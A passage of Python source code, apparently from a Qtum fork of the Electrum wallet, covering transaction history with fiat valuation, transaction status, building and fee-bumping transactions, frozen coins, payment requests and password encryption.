'outgoing': Satoshis(expenditures)
}
if fx and fx.is_enabled() and fx.get_history_config():
unrealized = self.unrealized_gains(None, fx.timestamp_rate, fx.ccy)
summary['fiat_currency'] = fx.ccy
summary['fiat_capital_gains'] = Fiat(capital_gains, fx.ccy)
summary['fiat_incoming'] = Fiat(fiat_income, fx.ccy)
summary['fiat_outgoing'] = Fiat(fiat_expenditures, fx.ccy)
summary['fiat_unrealized_gains'] = Fiat(unrealized, fx.ccy)
summary['fiat_start_balance'] = Fiat(fx.historical_value(start_balance, start_date), fx.ccy)
summary['fiat_end_balance'] = Fiat(fx.historical_value(end_balance, end_date), fx.ccy)
summary['fiat_start_value'] = Fiat(fx.historical_value(COIN, start_date), fx.ccy)
summary['fiat_end_value'] = Fiat(fx.historical_value(COIN, end_date), fx.ccy)
else:
summary = {}
return {
'transactions': out,
'summary': summary
}
def default_fiat_value(self, tx_hash, fx, value_sat):
return value_sat / Decimal(COIN) * self.price_at_timestamp(tx_hash, fx.timestamp_rate)
def get_tx_item_fiat(self, tx_hash, value, fx, tx_fee):
item = {}
fiat_value = self.get_fiat_value(tx_hash, fx.ccy)
fiat_default = fiat_value is None
fiat_rate = self.price_at_timestamp(tx_hash, fx.timestamp_rate)
fiat_value = fiat_value if fiat_value is not None else self.default_fiat_value(tx_hash, fx, value)
fiat_fee = tx_fee / Decimal(COIN) * fiat_rate if tx_fee is not None else None
item['fiat_currency'] = fx.ccy
item['fiat_rate'] = Fiat(fiat_rate, fx.ccy)
item['fiat_value'] = Fiat(fiat_value, fx.ccy)
item['fiat_fee'] = Fiat(fiat_fee, fx.ccy) if fiat_fee else None
item['fiat_default'] = fiat_default
if value < 0:
acquisition_price = - value / Decimal(COIN) * self.average_price(tx_hash, fx.timestamp_rate, fx.ccy)
liquidation_price = - fiat_value
item['acquisition_price'] = Fiat(acquisition_price, fx.ccy)
cg = liquidation_price - acquisition_price
item['capital_gain'] = Fiat(cg, fx.ccy)
return item
def get_label(self, tx_hash: str) -> str:
return self.labels.get(tx_hash, '') or self.get_default_label(tx_hash)
def get_default_label(self, tx_hash) -> str:
if not self.db.get_txi_addresses(tx_hash):
labels = []
for addr in self.db.get_txo_addresses(tx_hash):
label = self.labels.get(addr)
if label:
labels.append(label)
if labels:
return ', '.join(labels)
try:
tx = self.db.get_transaction(tx_hash)
if tx.outputs()[0].is_coinstake():
is_relevant, is_mine, delta, fee = self.get_wallet_delta(tx)
if delta and 0 < delta < 4 * 10 ** 7:
return _('contract gas refund')
return _('stake mined')
elif tx.inputs()[0].is_coinbase_input():
return 'coinbase'
except (BaseException,) as e:
self.logger.info(f'get_default_label {e}')
return ''
def get_tx_status(self, tx_hash, tx_mined_info: TxMinedInfo):
extra = []
height = tx_mined_info.height
conf = tx_mined_info.conf
timestamp = tx_mined_info.timestamp
is_staked = False
tx = None
try:
tx = self.db.get_transaction(tx_hash) or self.db.get_token_tx(tx_hash)
if tx is not None:
is_staked = tx.outputs()[0].is_coinstake()
except (BaseException,) as e:
self.logger.info(f'get_tx_status {repr(e)}')
if height == TX_HEIGHT_FUTURE:
assert conf < 0, conf
num_blocks_remainining = -conf
return 2, f'in {num_blocks_remainining} blocks'
if conf == 0:
if not tx:
return 2, 'unknown'
is_final = tx and tx.is_final()
if not is_final:
extra.append('rbf')
fee = self.get_tx_fee(tx_hash)
if fee is not None:
size = tx.estimated_size()
fee_per_byte = fee / size
extra.append(format_fee_satoshis(fee_per_byte) + ' sat/b')
if fee is not None and height in (TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED) \
and self.config.has_fee_mempool():
exp_n = self.config.fee_to_depth(fee_per_byte)
if exp_n:
extra.append('%.2f MB'%(exp_n/1000000))
if height == TX_HEIGHT_LOCAL:
status = 3
elif height == TX_HEIGHT_UNCONF_PARENT:
status = 1
elif height == TX_HEIGHT_UNCONFIRMED:
status = 0
else:
status = 2 # not SPV verified
elif is_staked:
status = 3 + max(min(conf // (COINBASE_MATURITY // RECOMMEND_CONFIRMATIONS), RECOMMEND_CONFIRMATIONS), 1)
else:
status = 3 + min(conf, RECOMMEND_CONFIRMATIONS)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = TX_STATUS[status] if status < 4 else time_str
if extra:
status_str += ' [%s]'%(', '.join(extra))
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def get_unconfirmed_base_tx_for_batching(self) -> Optional[Transaction]:
candidate = None
for hist_item in self.get_history():
# tx should not be mined yet
if hist_item.tx_mined_status.conf > 0: continue
# conservative future proofing of code: only allow known unconfirmed types
if hist_item.tx_mined_status.height not in (TX_HEIGHT_UNCONFIRMED,
TX_HEIGHT_UNCONF_PARENT,
TX_HEIGHT_LOCAL):
continue
# tx should be "outgoing" from wallet
if hist_item.delta >= 0:
continue
tx = self.db.get_transaction(hist_item.txid)
if not tx:
continue
# is_mine outputs should not be spent yet
# to avoid cancelling our own dependent transactions
txid = tx.txid()
if any([self.is_mine(o.address) and self.db.get_spent_outpoint(txid, output_idx)
for output_idx, o in enumerate(tx.outputs())]):
continue
# all inputs should be is_mine
if not all([self.is_mine(self.get_txin_address(txin)) for txin in tx.inputs()]):
continue
# prefer txns already in mempool (vs local)
if hist_item.tx_mined_status.height == TX_HEIGHT_LOCAL:
candidate = tx
continue
# tx must have opted-in for RBF
if tx.is_final(): continue
return tx
return candidate
def get_change_addresses_for_new_transaction(self, preferred_change_addr=None) -> List[str]:
change_addrs = []
if preferred_change_addr:
if isinstance(preferred_change_addr, (list, tuple)):
change_addrs = list(preferred_change_addr)
else:
change_addrs = [preferred_change_addr]
elif self.use_change:
# Recalc and get unused change addresses
addrs = self.calc_unused_change_addresses()
# New change addresses are created only after a few
# confirmations.
if addrs:
# if there are any unused, select all
change_addrs = addrs
else:
# if there are none, take one randomly from the last few
addrs = self.get_change_addresses(slice_start=-self.gap_limit_for_change)
change_addrs = [random.choice(addrs)] if addrs else []
for addr in change_addrs:
assert is_address(addr), f"not valid bitcoin address: {addr}"
# note that change addresses are not necessarily ismine
# in which case this is a no-op
self.check_address(addr)
max_change = self.max_change_outputs if self.multiple_change else 1
return change_addrs[:max_change]
def make_unsigned_transaction(self, *, coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], fee=None,
change_addr: str = None, gas_fee=0, sender=None, is_sweep=False) -> PartialTransaction:
if any([c.already_has_some_signatures() for c in coins]):
raise Exception("Some inputs already contain signatures!")
# prevent side-effect with '!'
outputs = copy.deepcopy(outputs)
# check outputs
i_max = None
for i, o in enumerate(outputs):
if o.value == '!':
if i_max is not None:
raise Exception("More than one output set to spend max")
i_max = i
if fee is None and self.config.fee_per_kb() is None:
raise NoDynamicFeeEstimates()
for item in coins:
self.add_input_info(item)
# Fee estimator
if fee is None:
fee_estimator = self.config.estimate_fee
elif isinstance(fee, Number):
fee_estimator = lambda size: fee
elif callable(fee):
fee_estimator = fee
else:
raise Exception(f'Invalid argument fee: {fee}')
if i_max is None:
# Let the coin chooser select the coins to spend
if sender:
coin_chooser = coinchooser.CoinChooserQtum()
else:
coin_chooser = coinchooser.get_coin_chooser(self.config)
# If there is an unconfirmed RBF tx, merge with it
base_tx = self.get_unconfirmed_base_tx_for_batching()
if self.config.get('batch_rbf', False) and base_tx:
# make sure we don't try to spend change from the tx-to-be-replaced:
coins = [c for c in coins if c.prevout.txid.hex() != base_tx.txid()]
is_local = self.get_tx_height(base_tx.txid()).height == TX_HEIGHT_LOCAL
base_tx = PartialTransaction.from_tx(base_tx)
base_tx.add_info_from_wallet(self)
base_tx_fee = base_tx.get_fee()
relayfeerate = Decimal(self.relayfee()) / 1000
original_fee_estimator = fee_estimator
def fee_estimator(size: Union[int, float, Decimal]) -> int:
size = Decimal(size)
lower_bound = base_tx_fee + round(size * relayfeerate)
lower_bound = lower_bound if not is_local else 0
return int(max(lower_bound, original_fee_estimator(size)))
txi = base_tx.inputs()
txo = list(filter(lambda o: not self.is_change(o.address), base_tx.outputs()))
old_change_addrs = [o.address for o in base_tx.outputs() if self.is_change(o.address)]
else:
txi = []
txo = []
old_change_addrs = []
# change address. if empty, coin_chooser will set it
change_addrs = self.get_change_addresses_for_new_transaction(change_addr or old_change_addrs)
tx = coin_chooser.make_tx(coins=coins,
inputs=txi,
outputs=list(outputs) + txo,
change_addrs=change_addrs,
fee_estimator_vb=fee_estimator,
dust_threshold=self.dust_threshold(),
gas_fee=gas_fee,
sender=sender)
else:
# "spend max" branch
# note: This *will* spend inputs with negative effective value (if there are any).
# Given as the user is spending "max", and so might be abandoning the wallet,
# try to include all UTXOs, otherwise leftover might remain in the UTXO set
# forever. see #5433
# note: Actually it might be the case that not all UTXOs from the wallet are
# being spent if the user manually selected UTXOs.
sendable = sum(map(lambda c: c.value_sats(), coins))
outputs[i_max].value = 0
tx = PartialTransaction.from_io(list(coins), list(outputs))
fee = fee_estimator(tx.estimated_size())
fee = fee + gas_fee
amount = sendable - tx.output_value() - fee
if amount < 0:
raise NotEnoughFunds()
outputs[i_max].value = amount
tx = PartialTransaction.from_io(list(coins), list(outputs))
# sender sort to make sure sender txi the first place
tx.sender_sort(sender)
# Timelock tx to current height.
tx.locktime = get_locktime_for_new_transaction(self.network)
tx.add_info_from_wallet(self)
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, *, outputs: List[PartialTxOutput], password=None, fee=None, change_addr=None,
domain=None, rbf=False, nonlocal_only=False, tx_version=None, sign=True) -> PartialTransaction:
coins = self.get_spendable_coins(domain, nonlocal_only=nonlocal_only)
tx = self.make_unsigned_transaction(coins=coins,
outputs=outputs,
fee=fee,
change_addr=change_addr)
tx.set_rbf(rbf)
if tx_version is not None:
tx.version = tx_version
if sign:
self.sign_transaction(tx, password)
return tx
def is_frozen_address(self, addr: str) -> bool:
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: PartialTxInput) -> bool:
prevout_str = utxo.prevout.to_str()
return prevout_str in self.frozen_coins
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
"""Set frozen state of the addresses to FREEZE, True or False"""
if all(self.is_mine(addr) for addr in addrs):
# FIXME take lock?
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
self.storage.put('frozen_addresses', list(self.frozen_addresses))
return True
return False
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
"""Set frozen state of the utxos to FREEZE, True or False"""
utxos = {utxo.prevout.to_str() for utxo in utxos}
# FIXME take lock?
if freeze:
self.frozen_coins |= set(utxos)
else:
self.frozen_coins -= set(utxos)
self.storage.put('frozen_coins', list(self.frozen_coins))
def wait_until_synchronized(self, callback=None):
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "{}\n{} {}".format(
_("Please wait..."),
_("Addresses generated:"),
len(self.get_addresses()))
callback(msg)
time.sleep(0.1)
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "{} \n".format(_("Connecting..."))
callback(msg)
time.sleep(0.1)
# wait until we are connected, because the user
# might have selected another server
if self.network:
self.logger.info("waiting for network...")
wait_for_network()
self.logger.info("waiting while wallet is syncing...")
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def address_is_old(self, address: str, *, req_conf: int = 3) -> bool:
"""Returns whether address has any history that is deeply confirmed."""
max_conf = -1
h = self.db.get_addr_history(address)
needs_spv_check = not self.config.get("skipmerklecheck", False)
for tx_hash, tx_height in h:
if needs_spv_check:
tx_age = self.get_tx_height(tx_hash).conf
else:
if tx_height <= 0:
tx_age = 0
else:
tx_age = self.get_local_height() - tx_height + 1
max_conf = max(max_conf, tx_age)
return max_conf >= req_conf
def bump_fee(self, *, tx: Transaction, new_fee_rate: Union[int, float, Decimal],
coins: Sequence[PartialTxInput] = None) -> PartialTransaction:
"""Increase the miner fee of 'tx'.
'new_fee_rate' is the target min rate in sat/vbyte
'coins' is a list of UTXOs we can choose from as potential new inputs to be added
"""
if tx.is_final():
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('transaction is final'))
new_fee_rate = quantize_feerate(new_fee_rate) # strip excess precision
old_tx_size = tx.estimated_size()
old_txid = tx.txid()
assert old_txid
old_fee = self.get_tx_fee(old_txid)
if old_fee is None:
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('current fee unknown'))
old_fee_rate = old_fee / old_tx_size # sat/vbyte
if new_fee_rate <= old_fee_rate:
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _("The new fee rate needs to be higher than the old fee rate."))
try:
# method 1: keep all inputs, keep all not is_mine outputs,
# allow adding new inputs
tx_new = self._bump_fee_through_coinchooser(
tx=tx, new_fee_rate=new_fee_rate, coins=coins)
method_used = 1
except CannotBumpFee:
# method 2: keep all inputs, no new inputs are added,
# allow decreasing and removing outputs (change is decreased first)
# This is less "safe" as it might end up decreasing e.g. a payment to a merchant;
# but e.g. if the user has sent "Max" previously, this is the only way to RBF.
tx_new = self._bump_fee_through_decreasing_outputs(
tx=tx, new_fee_rate=new_fee_rate)
method_used = 2
target_min_fee = new_fee_rate * tx_new.estimated_size()
actual_fee = tx_new.get_fee()
if actual_fee + 1 < target_min_fee:
raise Exception(f"bump_fee fee target was not met (method: {method_used}). "
f"got {actual_fee}, expected >={target_min_fee}. "
f"target rate was {new_fee_rate}")
tx_new.locktime = get_locktime_for_new_transaction(self.network)
return tx_new
def _bump_fee_through_coinchooser(self, *, tx: Transaction, new_fee_rate: Union[int, Decimal],
coins: Sequence[PartialTxInput] = None) -> PartialTransaction:
tx = PartialTransaction.from_tx(tx)
tx.add_info_from_wallet(self)
old_inputs = list(tx.inputs())
old_outputs = list(tx.outputs())
# change address
old_change_addrs = [o.address for o in old_outputs if self.is_change(o.address)]
change_addrs = self.get_change_addresses_for_new_transaction(old_change_addrs)
# which outputs to keep?
if old_change_addrs:
fixed_outputs = list(filter(lambda o: not self.is_change(o.address), old_outputs))
else:
if all(self.is_mine(o.address) for o in old_outputs):
# all outputs are is_mine and none of them are change.
# we bail out as it's unclear what the user would want!
# the coinchooser bump fee method is probably not a good idea in this case
raise CannotBumpFee(_('Cannot bump fee') + ': all outputs are non-change is_mine')
old_not_is_mine = list(filter(lambda o: not self.is_mine(o.address), old_outputs))
if old_not_is_mine:
fixed_outputs = old_not_is_mine
else:
fixed_outputs = old_outputs
if not fixed_outputs:
raise CannotBumpFee(_('Cannot bump fee') + ': could not figure out which outputs to keep')
if coins is None:
coins = self.get_spendable_coins(None)
# make sure we don't try to spend output from the tx-to-be-replaced:
coins = [c for c in coins if c.prevout.txid.hex() != tx.txid()]
for item in coins:
self.add_input_info(item)
def fee_estimator(size):
return self.config.estimate_fee_for_feerate(fee_per_kb=new_fee_rate*1000, size=size)
coin_chooser = coinchooser.get_coin_chooser(self.config)
try:
return coin_chooser.make_tx(coins=coins,
inputs=old_inputs,
outputs=fixed_outputs,
change_addrs=change_addrs,
fee_estimator_vb=fee_estimator,
dust_threshold=self.dust_threshold())
except NotEnoughFunds as e:
raise CannotBumpFee(e)
def _bump_fee_through_decreasing_outputs(self, *, tx: Transaction,
new_fee_rate: Union[int, Decimal]) -> PartialTransaction:
tx = PartialTransaction.from_tx(tx)
tx.add_info_from_wallet(self)
inputs = tx.inputs()
outputs = list(tx.outputs())
# use own outputs
s = list(filter(lambda o: self.is_mine(o.address), outputs))
# ... unless there is none
if not s:
s = outputs
x_fee = run_hook('get_tx_extra_fee', self, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
s = filter(lambda o: o.address != x_fee_address, s)
if not s:
raise CannotBumpFee(_('Cannot bump fee') + ': no outputs at all??')
# prioritize low value outputs, to get rid of dust
s = sorted(s, key=lambda o: o.value)
for o in s:
target_fee = int(round(tx.estimated_size() * new_fee_rate))
delta = target_fee - tx.get_fee()
i = outputs.index(o)
if o.value - delta >= self.dust_threshold():
new_output_value = o.value - delta
assert isinstance(new_output_value, int)
outputs[i].value = new_output_value
delta = 0
break
else:
del outputs[i]
delta -= o.value
# note: delta might be negative now, in which case
# the value of the next output will be increased
if delta > 0:
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('could not find suitable outputs'))
return PartialTransaction.from_io(inputs, outputs)
def cpfp(self, tx: Transaction, fee: int) -> Optional[PartialTransaction]:
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
address, value = o.address, o.value
if self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(TxOutpoint.from_str(txid+':%d'%i))
if not item:
return
self.add_input_info(item)
inputs = [item]
out_address = self.get_unused_address() or address
outputs = [PartialTxOutput.from_address_and_value(out_address, value - fee)]
locktime = get_locktime_for_new_transaction(self.network)
return PartialTransaction.from_io(inputs, outputs, locktime=locktime)
@abstractmethod
def _add_input_sig_info(self, txin: PartialTxInput, address: str, *, only_der_suffix: bool = True) -> None:
pass
def _add_txinout_derivation_info(self, txinout: Union[PartialTxInput, PartialTxOutput],
address: str, *, only_der_suffix: bool = True) -> None:
pass # implemented by subclasses
def _add_input_utxo_info(self, txin: PartialTxInput, address: str) -> None:
if Transaction.is_segwit_input(txin):
if txin.witness_utxo is None:
received, spent = self.get_addr_io(address)
item = received.get(txin.prevout.to_str())
if item:
txin_value = item[1]
txin.witness_utxo = TxOutput.from_address_and_value(address, txin_value)
else: # legacy input
if txin.utxo is None:
# note: for hw wallets, for legacy inputs, ignore_network_issues used to be False
txin.utxo = self.get_input_tx(txin.prevout.txid.hex(), ignore_network_issues=True)
# If there is a NON-WITNESS UTXO, but we know input is segwit, add a WITNESS UTXO, based on it.
# This could have happened if previously another wallet had put a NON-WITNESS UTXO for txin,
# as they did not know if it was segwit. This switch is needed to interop with bitcoin core.
if txin.utxo and Transaction.is_segwit_input(txin):
txin.convert_utxo_to_witness_utxo()
txin.ensure_there_is_only_one_utxo()
def _learn_derivation_path_for_address_from_txinout(self, txinout: Union[PartialTxInput, PartialTxOutput],
address: str) -> bool:
"""Tries to learn the derivation path for an address (potentially beyond gap limit)
using data available in given txin/txout.
Returns whether the address was found to be is_mine.
"""
return False # implemented by subclasses
def add_input_info(self, txin: PartialTxInput, *, only_der_suffix: bool = True) -> None:
address = self.get_txin_address(txin)
if not self.is_mine(address):
is_mine = self._learn_derivation_path_for_address_from_txinout(txin, address)
if not is_mine:
return
# set script_type first, as later checks might rely on it:
txin.script_type = self.get_txin_type(address)
self._add_input_utxo_info(txin, address)
txin.num_sig = self.m if isinstance(self, Multisig_Wallet) else 1
if txin.redeem_script is None:
try:
redeem_script_hex = self.get_redeem_script(address)
txin.redeem_script = bfh(redeem_script_hex) if redeem_script_hex else None
except UnknownTxinType:
pass
if txin.witness_script is None:
try:
witness_script_hex = self.get_witness_script(address)
txin.witness_script = bfh(witness_script_hex) if witness_script_hex else None
except UnknownTxinType:
pass
self._add_input_sig_info(txin, address, only_der_suffix=only_der_suffix)
def can_sign(self, tx: Transaction) -> bool:
if not isinstance(tx, PartialTransaction):
return False
if tx.is_complete():
return False
# add info to inputs if we can; otherwise we might return a false negative:
tx.add_info_from_wallet(self)
for k in self.get_keystores():
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash, *, ignore_network_issues=False) -> Optional[Transaction]:
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.db.get_transaction(tx_hash)
if not tx and self.network:
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(tx_hash, timeout=10))
except NetworkException as e:
self.logger.info(f'got network error getting input txn. err: {repr(e)}. txid: {tx_hash}. '
f'if you are intentionally offline, consider using the --offline flag')
if not ignore_network_issues:
raise e
else:
tx = Transaction(raw_tx)
return tx
def add_output_info(self, txout: PartialTxOutput, *, only_der_suffix: bool = True) -> None:
address = txout.address
if not self.is_mine(address):
is_mine = self._learn_derivation_path_for_address_from_txinout(txout, address)
if not is_mine:
return
txout.script_type = self.get_txin_type(address)
txout.is_mine = True
txout.is_change = self.is_change(address)
if isinstance(self, Multisig_Wallet):
txout.num_sig = self.m
self._add_txinout_derivation_info(txout, address, only_der_suffix=only_der_suffix)
if txout.redeem_script is None:
try:
redeem_script_hex = self.get_redeem_script(address)
txout.redeem_script = bfh(redeem_script_hex) if redeem_script_hex else None
except UnknownTxinType:
pass
if txout.witness_script is None:
try:
witness_script_hex = self.get_witness_script(address)
txout.witness_script = bfh(witness_script_hex) if witness_script_hex else None
except UnknownTxinType:
pass
def sign_transaction(self, tx: Transaction, password) -> Optional[PartialTransaction]:
if self.is_watching_only():
return
if not isinstance(tx, PartialTransaction):
return
# add info to a temporary tx copy; including xpubs
# and full derivation paths as hw keystores might want them
tmp_tx = copy.deepcopy(tx)
tmp_tx.add_info_from_wallet(self, include_xpubs_and_full_paths=True)
# sign. start with ready keystores.
for k in sorted(self.get_keystores(), key=lambda ks: ks.ready_to_sign(), reverse=True):
try:
if k.can_sign(tmp_tx):
k.sign_transaction(tmp_tx, password)
except UserCancelled:
continue
# remove sensitive info; then copy back details from temporary tx
tmp_tx.remove_xpubs_and_bip32_paths()
tx.combine_with_other_psbt(tmp_tx)
tx.add_info_from_wallet(self, include_xpubs_and_full_paths=False)
return tx
def try_detecting_internal_addresses_corruption(self) -> None:
pass
def check_address(self, addr: str) -> None:
pass
def check_returned_address(func):
def wrapper(self, *args, **kwargs):
addr = func(self, *args, **kwargs)
self.check_address(addr)
return addr
return wrapper
def get_unused_addresses(self) -> Sequence[str]:
domain = self.get_receiving_addresses()
in_use_by_request = [k for k in self.receive_requests.keys() if self.get_request_status(k)[0] != PR_EXPIRED]
return [addr for addr in domain if not self.is_used(addr)
and addr not in in_use_by_request]
@check_returned_address
def get_unused_address(self) -> Optional[str]:
addrs = self.get_unused_addresses()
if addrs:
return addrs[0]
@check_returned_address
def get_receiving_address(self):
# always return an address
domain = self.get_receiving_addresses()
if not domain:
return
choice = domain[0]
for addr in domain:
if not self.is_used(addr):
if addr not in self.receive_requests.keys():
return addr
else:
choice = addr
return choice
def create_new_address(self, for_change: bool = False):
raise Exception("this wallet cannot generate new addresses")
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.db.get_verified_tx(txid)
if info:
conf = local_height - info.height + 1
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def get_request_URI(self, addr):
req = self.receive_requests[addr]
message = self.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def get_request_status(self, address):
r = self.receive_requests.get(address)
if r is None:
return PR_UNKNOWN
amount = r.get('amount', 0) or 0
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
exp = r.get('exp', 0) or 0
paid, conf = self.get_payment_status(address, amount)
if not paid:
if exp > 0 and time.time() > timestamp + exp:
status = PR_EXPIRED
else:
status = PR_UNPAID
else:
status = PR_PAID
return status, conf
def get_request(self, key):
req = self.receive_requests.get(key)
if not req:
return
req = copy.copy(req)
_type = req.get('type')
if _type == PR_TYPE_ONCHAIN:
addr = req['address']
req['URI'] = self.get_request_URI(addr)
status, conf = self.get_request_status(addr)
req['status'] = status
if conf is not None:
req['confirmations'] = conf
elif self.lnworker and _type == PR_TYPE_LN:
req['status'] = self.lnworker.get_payment_status(bfh(key))
else:
return
# add URL if we are running a payserver
if self.config.get('run_payserver'):
host = self.config.get('payserver_host', 'localhost')
port = self.config.get('payserver_port', 8002)
root = self.config.get('payserver_root', '/r')
use_ssl = bool(self.config.get('ssl_keyfile'))
protocol = 'https' if use_ssl else 'http'
base = '%s://%s:%d'%(protocol, host, port)
req['view_url'] = base + root + '/pay?id=' + key
if use_ssl and 'URI' in req:
request_url = base + '/bip70/' + key + '.bip70'
req['bip70_url'] = request_url
return req
def receive_tx_callback(self, tx_hash, tx, tx_height):
super().receive_tx_callback(tx_hash, tx, tx_height)
for txo in tx.outputs():
addr = self.get_txout_address(txo)
if addr in self.receive_requests:
status, conf = self.get_request_status(addr)
self.network.trigger_callback('payment_received', self, addr, status)
def make_payment_request(self, addr, amount, message, expiration):
timestamp = int(time.time())
_id = bh2u(sha256d(addr + "%d"%timestamp))[0:10]
return {
'type': PR_TYPE_ONCHAIN,
'time':timestamp,
'amount':amount,
'exp':expiration,
'address':addr,
'memo':message,
'id':_id,
'outputs': [PartialTxOutput.from_address_and_value(addr, amount)],
}
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = pr.pki_data
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.storage.put('payment_requests', self.receive_requests)
def add_payment_request(self, req):
if req['type'] == PR_TYPE_ONCHAIN:
addr = req['address']
if not bitcoin.is_address(addr):
raise Exception(_('Invalid qtum address.'))
if not self.is_mine(addr):
raise Exception(_('Address not in wallet.'))
key = addr
message = req['memo']
elif req['type'] == PR_TYPE_LN:
key = req['rhash']
message = req['message']
else:
raise Exception('Unknown request type')
amount = req.get('amount')
self.receive_requests[key] = req
self.storage.put('payment_requests', self.receive_requests)
self.set_label(key, message) # should be a default label
return req
def delete_request(self, key):
""" lightning or on-chain """
if key in self.receive_requests:
self.remove_payment_request(key)
elif self.lnworker:
self.lnworker.delete_payment(key)
def delete_invoice(self, key):
""" lightning or on-chain """
if key in self.invoices:
self.invoices.pop(key)
self.storage.put('invoices', self.invoices)
elif self.lnworker:
self.lnworker.delete_payment(key)
def remove_payment_request(self, addr):
if addr not in self.receive_requests:
return False
self.receive_requests.pop(addr)
self.storage.put('payment_requests', self.receive_requests)
return True
def get_sorted_requests(self):
""" sorted by timestamp """
out = [self.get_request(x) for x in self.receive_requests.keys()]
out = [x for x in out if x is not None]
out.sort(key=operator.itemgetter('time'))
return out
@abstractmethod
def get_fingerprint(self):
pass
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def has_password(self):
return self.has_keystore_encryption() or self.has_storage_encryption()
def can_have_keystore_encryption(self):
return self.keystore and self.keystore.may_have_password()
def get_available_storage_encryption_version(self) -> StorageEncryptionVersion:
"""Returns the type of storage encryption offered to the user.
A wallet file (storage) is either encrypted with this version
or is stored in plaintext.
"""
if isinstance(self.keystore, Hardware_KeyStore):
return StorageEncryptionVersion.XPUB_PASSWORD
else:
return StorageEncryptionVersion.USER_PASSWORD
def has_keystore_encryption(self):
"""Returns whether encryption is enabled for the keystore.
If True, e.g. signing a transaction will require a password.
"""
if self.can_have_keystore_encryption():
return self.storage.get('use_encryption', False)
return False
def has_storage_encryption(self):
"""Returns whether encryption is enabled for the wallet file on disk."""
return self.storage.is_encrypted()
@classmethod
def may_have_password(cls):
return True
def check_password(self, password):
if self.has_keystore_encryption():
self.keystore.check_password(password)
self.storage.check_password(password)
def update_password(self, old_pw, new_pw, *, encrypt_storage: bool = True):
if old_pw is None and self.has_password():
raise InvalidPassword()
self.check_password(old_pw)
if encrypt_storage:
enc_version = self.get_available_storage_encryption_version()
else:
enc_version = StorageEncryptionVersion.PLAINTEXT
self.storage.set_password(new_pw, enc_version)
# note: Encrypting storage with a hw device is currently only
# allowed for non-multisig wallets. Further,
# Hardware_KeyStore.may_have_password() == False.
# If these were not the case,
# extra care would need to be taken when encrypting keystores.
self._update_password_for_keystore(old_pw, new_pw)
encrypt_keystore = self.can_have_keystore_encryption()
self.storage.set_keystore_encryption(bool(new_pw) and encrypt_keystore)
self.storage.write()
@abstractmethod
def _update_password_for_keystore(self, old_pw: Optional[str], new_pw: Optional[str]) -> None:
pass
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey: str, message, password) -> bytes:
addr = self.pubkeys_to_address([pubkey])
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
@abstractmethod
def pubkeys_to_address(self, pubkeys: Sequence[str]) -> Optional[str]:
pass
def txin_value(self, txin: TxInput) -> Optional[int]:
if isinstance(txin, PartialTxInput):
v = txin.value_sats()
if v: return v
txid = txin.prevout.txid.hex()
prev_n = txin.prevout.out_idx
for addr in self.db.get_txo_addresses(txid):
d = self.db.get_txo_addr(txid, addr)
for n, v, cb in d:
if n == prev_n:
return v
# may occur if wallet is not synchronized
return None
def price_at_timestamp(self, txid, price_func):
"""Returns fiat price of bitcoin at the time tx got confirmed."""
timestamp = self.get_tx_height(txid).timestamp
return price_func(timestamp if timestamp else time.time())
def unrealized_gains(self, domain, price_func, ccy):
coins = self.get_utxos(domain)
now = time.time()
p = price_func(now)
ap = sum(self.coin_price(coin.prevout.txid.hex(), price_func, ccy, self.txin_value(coin)) for coin in coins)
lp = sum([coin.value_sats() for coin in coins]) * p / Decimal(COIN)
return lp - ap
def average_price(self, txid, price_func, ccy):
""" Average acquisition price of the inputs of a transaction """
input_value = 0
total_price = 0
for addr in self.db.get_txi_addresses(txid):
d = self.db.get_txi_addr(txid, addr)
for ser, v in d:
input_value += v
total_price += self.coin_price(ser.split(':')[0], price_func, ccy, v)
return total_price / (input_value/Decimal(COIN))
def clear_coin_price_cache(self):
